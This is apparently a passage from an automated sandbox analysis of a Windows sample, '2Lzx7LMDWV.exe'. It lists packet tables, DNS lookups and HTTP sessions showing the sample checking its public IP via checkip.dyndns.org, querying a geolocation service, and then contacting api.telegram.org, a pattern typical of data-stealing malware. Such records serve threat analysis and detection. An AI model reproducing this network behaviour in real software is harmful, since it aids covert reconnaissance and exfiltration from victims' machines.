Nov 1, 2024 04:49:09.491314888 CET	49741	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:09.491331100 CET	443	49741	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:09.630378008 CET	443	49741	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:09.630603075 CET	443	49741	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:09.630656004 CET	49741	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:09.637888908 CET	49741	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:09.651964903 CET	49740	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:09.653318882 CET	49742	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:09.657174110 CET	80	49740	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:09.657232046 CET	49740	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:09.658124924 CET	80	49742	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:09.658185959 CET	49742	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:09.658282995 CET	49742	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:09.663033962 CET	80	49742	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:10.512249947 CET	80	49742	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:10.513504982 CET	49743	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:10.513546944 CET	443	49743	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:10.513643980 CET	49743	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:10.513850927 CET	49743	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:10.513864040 CET	443	49743	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:10.566658020 CET	49742	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:11.127805948 CET	443	49743	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:11.129851103 CET	49743	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:11.129873991 CET	443	49743	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:11.272670984 CET	443	49743	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:11.272901058 CET	443	49743	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:11.273006916 CET	49743	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:11.273355961 CET	49743	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:11.276264906 CET	49742	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:11.277214050 CET	49744	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:11.281541109 CET	80	49742	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:11.281615973 CET	49742	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:11.282098055 CET	80	49744	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:11.282170057 CET	49744	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:11.282382965 CET	49744	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:11.287173033 CET	80	49744	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:12.106864929 CET	80	49744	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:12.108079910 CET	49745	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:12.108118057 CET	443	49745	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:12.108191013 CET	49745	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:12.108408928 CET	49745	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:12.108422995 CET	443	49745	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:12.160445929 CET	49744	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:12.762576103 CET	443	49745	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:12.764323950 CET	49745	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:12.764352083 CET	443	49745	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:12.909746885 CET	443	49745	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:12.909809113 CET	443	49745	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:12.909960032 CET	49745	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:12.910597086 CET	49745	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:12.913659096 CET	49744	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:12.914917946 CET	49746	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:12.919071913 CET	80	49744	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:12.919142008 CET	49744	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:12.919801950 CET	80	49746	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:12.919883966 CET	49746	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:12.919950962 CET	49746	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:12.924803019 CET	80	49746	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:13.751689911 CET	80	49746	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:13.752973080 CET	49747	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:13.753005028 CET	443	49747	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:13.753072023 CET	49747	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:13.753284931 CET	49747	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:13.753298044 CET	443	49747	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:13.801024914 CET	49746	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:14.375145912 CET	443	49747	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:14.377566099 CET	49747	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:14.377588034 CET	443	49747	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:14.520497084 CET	443	49747	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:14.520709038 CET	443	49747	188.114.96.3	192.168.2.4
Nov 1, 2024 04:49:14.520780087 CET	49747	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:14.521151066 CET	49747	443	192.168.2.4	188.114.96.3
Nov 1, 2024 04:49:14.523852110 CET	49746	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:14.524683952 CET	49748	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:14.529043913 CET	80	49746	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:14.529126883 CET	49746	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:14.529505968 CET	80	49748	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:14.529573917 CET	49748	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:14.529656887 CET	49748	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:14.534626961 CET	80	49748	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:15.364695072 CET	80	49748	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:15.379121065 CET	49749	443	192.168.2.4	188.114.97.3
Nov 1, 2024 04:49:15.379154921 CET	443	49749	188.114.97.3	192.168.2.4
Nov 1, 2024 04:49:15.379224062 CET	49749	443	192.168.2.4	188.114.97.3
Nov 1, 2024 04:49:15.379446983 CET	49749	443	192.168.2.4	188.114.97.3
Nov 1, 2024 04:49:15.379462004 CET	443	49749	188.114.97.3	192.168.2.4
Nov 1, 2024 04:49:15.410384893 CET	49748	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:16.002057076 CET	443	49749	188.114.97.3	192.168.2.4
Nov 1, 2024 04:49:16.003498077 CET	49749	443	192.168.2.4	188.114.97.3
Nov 1, 2024 04:49:16.003516912 CET	443	49749	188.114.97.3	192.168.2.4
Nov 1, 2024 04:49:16.147377968 CET	443	49749	188.114.97.3	192.168.2.4
Nov 1, 2024 04:49:16.147631884 CET	443	49749	188.114.97.3	192.168.2.4
Nov 1, 2024 04:49:16.147697926 CET	49749	443	192.168.2.4	188.114.97.3
Nov 1, 2024 04:49:16.148225069 CET	49749	443	192.168.2.4	188.114.97.3
Nov 1, 2024 04:49:16.154011011 CET	49748	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:16.154668093 CET	49751	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:16.159089088 CET	80	49748	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:16.159145117 CET	49748	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:16.159504890 CET	80	49751	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:16.159579039 CET	49751	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:16.159661055 CET	49751	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:16.164424896 CET	80	49751	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:17.001316071 CET	80	49751	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:17.009605885 CET	49752	443	192.168.2.4	188.114.97.3
Nov 1, 2024 04:49:17.009639978 CET	443	49752	188.114.97.3	192.168.2.4
Nov 1, 2024 04:49:17.014130116 CET	49752	443	192.168.2.4	188.114.97.3
Nov 1, 2024 04:49:17.014627934 CET	49752	443	192.168.2.4	188.114.97.3
Nov 1, 2024 04:49:17.014645100 CET	443	49752	188.114.97.3	192.168.2.4
Nov 1, 2024 04:49:17.051016092 CET	49751	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:17.631937027 CET	443	49752	188.114.97.3	192.168.2.4
Nov 1, 2024 04:49:17.633665085 CET	49752	443	192.168.2.4	188.114.97.3
Nov 1, 2024 04:49:17.633691072 CET	443	49752	188.114.97.3	192.168.2.4
Nov 1, 2024 04:49:17.783761024 CET	443	49752	188.114.97.3	192.168.2.4
Nov 1, 2024 04:49:17.783993006 CET	443	49752	188.114.97.3	192.168.2.4
Nov 1, 2024 04:49:17.784063101 CET	49752	443	192.168.2.4	188.114.97.3
Nov 1, 2024 04:49:17.784666061 CET	49752	443	192.168.2.4	188.114.97.3
Nov 1, 2024 04:49:17.800479889 CET	49751	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:17.805618048 CET	80	49751	193.122.6.168	192.168.2.4
Nov 1, 2024 04:49:17.805669069 CET	49751	80	192.168.2.4	193.122.6.168
Nov 1, 2024 04:49:17.808456898 CET	49754	443	192.168.2.4	149.154.167.220
Nov 1, 2024 04:49:17.808485031 CET	443	49754	149.154.167.220	192.168.2.4
Nov 1, 2024 04:49:17.808542967 CET	49754	443	192.168.2.4	149.154.167.220
Nov 1, 2024 04:49:17.808947086 CET	49754	443	192.168.2.4	149.154.167.220
Nov 1, 2024 04:49:17.808959007 CET	443	49754	149.154.167.220	192.168.2.4
Nov 1, 2024 04:49:18.667562008 CET	443	49754	149.154.167.220	192.168.2.4
Nov 1, 2024 04:49:18.667773008 CET	49754	443	192.168.2.4	149.154.167.220
Nov 1, 2024 04:49:18.669410944 CET	49754	443	192.168.2.4	149.154.167.220
Nov 1, 2024 04:49:18.669418097 CET	443	49754	149.154.167.220	192.168.2.4
Nov 1, 2024 04:49:18.669676065 CET	443	49754	149.154.167.220	192.168.2.4
Nov 1, 2024 04:49:18.671139956 CET	49754	443	192.168.2.4	149.154.167.220
Nov 1, 2024 04:49:18.711380005 CET	443	49754	149.154.167.220	192.168.2.4
Nov 1, 2024 04:49:18.911089897 CET	443	49754	149.154.167.220	192.168.2.4
Nov 1, 2024 04:49:18.911231041 CET	443	49754	149.154.167.220	192.168.2.4
Nov 1, 2024 04:49:18.911322117 CET	49754	443	192.168.2.4	149.154.167.220
Nov 1, 2024 04:49:18.917737007 CET	49754	443	192.168.2.4	149.154.167.220
Nov 1, 2024 04:49:34.933779955 CET	49738	80	192.168.2.4	193.122.6.168

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 04:49:02.917643070 CET	60237	53	192.168.2.4	1.1.1.1
Nov 1, 2024 04:49:02.924252033 CET	53	60237	1.1.1.1	192.168.2.4
Nov 1, 2024 04:49:04.117544889 CET	51490	53	192.168.2.4	1.1.1.1
Nov 1, 2024 04:49:04.124567032 CET	53	51490	1.1.1.1	192.168.2.4
Nov 1, 2024 04:49:15.366580963 CET	49530	53	192.168.2.4	1.1.1.1
Nov 1, 2024 04:49:15.378453970 CET	53	49530	1.1.1.1	192.168.2.4
Nov 1, 2024 04:49:17.801120043 CET	60783	53	192.168.2.4	1.1.1.1
Nov 1, 2024 04:49:17.807873011 CET	53	60783	1.1.1.1	192.168.2.4
Nov 1, 2024 04:49:33.401596069 CET	53	63377	162.159.36.2	192.168.2.4
Nov 1, 2024 04:49:34.016191959 CET	63222	53	192.168.2.4	1.1.1.1
Nov 1, 2024 04:49:34.023062944 CET	53	63222	1.1.1.1	192.168.2.4
Nov 1, 2024 04:49:36.015732050 CET	58931	53	192.168.2.4	1.1.1.1
Nov 1, 2024 04:49:36.025054932 CET	53	58931	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 1, 2024 04:49:02.917643070 CET	192.168.2.4	1.1.1.1	0x229b	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 1, 2024 04:49:04.117544889 CET	192.168.2.4	1.1.1.1	0xd737	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 1, 2024 04:49:15.366580963 CET	192.168.2.4	1.1.1.1	0x5cf1	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 1, 2024 04:49:17.801120043 CET	192.168.2.4	1.1.1.1	0x91f2	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Nov 1, 2024 04:49:34.016191959 CET	192.168.2.4	1.1.1.1	0x2a22	Standard query (0)	15.164.165.52.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Nov 1, 2024 04:49:36.015732050 CET	192.168.2.4	1.1.1.1	0xa516	Standard query (0)	200.163.202.172.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 1, 2024 04:49:02.924252033 CET	1.1.1.1	192.168.2.4	0x229b	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 04:49:02.924252033 CET	1.1.1.1	192.168.2.4	0x229b	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 1, 2024 04:49:02.924252033 CET	1.1.1.1	192.168.2.4	0x229b	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 1, 2024 04:49:02.924252033 CET	1.1.1.1	192.168.2.4	0x229b	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 1, 2024 04:49:02.924252033 CET	1.1.1.1	192.168.2.4	0x229b	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 1, 2024 04:49:02.924252033 CET	1.1.1.1	192.168.2.4	0x229b	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 1, 2024 04:49:04.124567032 CET	1.1.1.1	192.168.2.4	0xd737	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 1, 2024 04:49:04.124567032 CET	1.1.1.1	192.168.2.4	0xd737	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 1, 2024 04:49:15.378453970 CET	1.1.1.1	192.168.2.4	0x5cf1	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 1, 2024 04:49:15.378453970 CET	1.1.1.1	192.168.2.4	0x5cf1	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 1, 2024 04:49:17.807873011 CET	1.1.1.1	192.168.2.4	0x91f2	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Nov 1, 2024 04:49:34.023062944 CET	1.1.1.1	192.168.2.4	0x2a22	Name error (3)	15.164.165.52.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Nov 1, 2024 04:49:36.025054932 CET	1.1.1.1	192.168.2.4	0xa516	Name error (3)	200.163.202.172.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	193.122.6.168	80	7620	C:\Users\user\Desktop\2Lzx7LMDWV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 04:49:02.966454029 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 1, 2024 04:49:03.801280975 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 03:49:03 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 88ff7b29516b4779304c1820918e96be Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>
Nov 1, 2024 04:49:03.823712111 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 1, 2024 04:49:04.067662954 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 03:49:03 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5738cadb38cc97204d35e7f336daed68 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>
Nov 1, 2024 04:49:05.289273977 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 1, 2024 04:49:05.539391994 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 03:49:05 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1dd691f23f5105dccbff62a01e6ab8cb Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	193.122.6.168	80	7620	C:\Users\user\Desktop\2Lzx7LMDWV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 04:49:06.319705963 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 1, 2024 04:49:07.167191029 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 03:49:07 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 156683046f0ea09072acec983b039f46 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	193.122.6.168	80	7620	C:\Users\user\Desktop\2Lzx7LMDWV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 04:49:07.969710112 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 1, 2024 04:49:08.804523945 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 03:49:08 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 75c6c5309aa976deb474279d0fff6905 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	193.122.6.168	80	7620	C:\Users\user\Desktop\2Lzx7LMDWV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 04:49:09.658282995 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 1, 2024 04:49:10.512249947 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 03:49:10 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 81e9c68920d11382174dfff708c7534a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	193.122.6.168	80	7620	C:\Users\user\Desktop\2Lzx7LMDWV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 04:49:11.282382965 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 1, 2024 04:49:12.106864929 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 03:49:11 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 88aa061e296b35cf172758ae591b3b58 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	193.122.6.168	80	7620	C:\Users\user\Desktop\2Lzx7LMDWV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 04:49:12.919950962 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 1, 2024 04:49:13.751689911 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 03:49:13 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 83fd499982df19fd0556bc086b783cb1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	193.122.6.168	80	7620	C:\Users\user\Desktop\2Lzx7LMDWV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 04:49:14.529656887 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 1, 2024 04:49:15.364695072 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 03:49:15 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d49d048665a6ce4fc1d0d8ba79f2b565 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49751	193.122.6.168	80	7620	C:\Users\user\Desktop\2Lzx7LMDWV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 04:49:16.159661055 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 1, 2024 04:49:17.001316071 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 03:49:16 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 770845077b271bf66a89e9630740fa1b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
